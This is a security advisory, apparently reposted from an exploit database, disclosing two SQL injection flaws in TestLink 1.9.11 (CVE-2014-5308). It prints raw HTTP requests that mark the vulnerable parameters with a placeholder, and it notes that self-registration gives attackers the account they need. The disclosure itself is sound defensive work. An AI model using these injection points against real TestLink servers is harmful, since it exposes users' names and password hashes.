TestLink 1.9.11 - Multiple SQL Injection Vulnerabilities

2014-10-02T00:00:00
ID 1337DAY-ID-22721
Type zdt
Reporter Portcullis
Modified 2014-10-02T00:00:00

Description

Two SQL injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from Multiple SQL injections

                                        
                                            Vulnerability title: Multiple SQL Injection Vulnerabilities in TestLink
CVE: CVE-2014-5308
Vendor: Testlink
Product: TestLink
Affected version: 1.9.11
Fixed version: Fixed in SVN commit number 7a09973
Reported by: Jerzy Kramarz
 
Details:
 
Two SQL injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:
 
Vulnerability 1 (Fixed in commit #7a09973 in official repository)
 
<pre>
 
POST /testlink/lib/project/projectView.php?doAction=search HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.56.101/testlink/lib/project/projectEdit.php
Cookie: [...]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
 
CSRFName=CSRFGuard_1740781925&CSRFToken=b16[...]&name=<SQL Injection>&search=Search%2FFilter
 
</pre>
 
Vulnerability 2 (Fixed in patches after commit #7a09973 in official repository)
 
<pre>
 
POST /testlink/lib/events/eventinfo.php HTTP/1.1
Content-Length: 6
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Host: 192.168.56.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
DNT: 1
Connection: close
Referer: http://192.168.56.101/testlink/lib/events/eventviewer.php
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [...] ys-edit_tc_tproject_id_1_ext-comp-1001=a%3As%253A/1; ys-tl_table_eventviewer={"columns":[{"id":1,"width":217,"hidden":true,"sortable":true}],"sort":{"field":"id_th_timestamp","direction":"DESC"},"group":"id_th_loglevel","filters":{}}
 
id=123<SQL Injection>
 
</pre>
 
Note:'Any user can create account for the application in 'testlink/firstLogin.php' page hence its possible to exploit aforementioned SQL injections without prior knowledge of the authentication details.'
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5308/

#  0day.today [2018-01-08]  #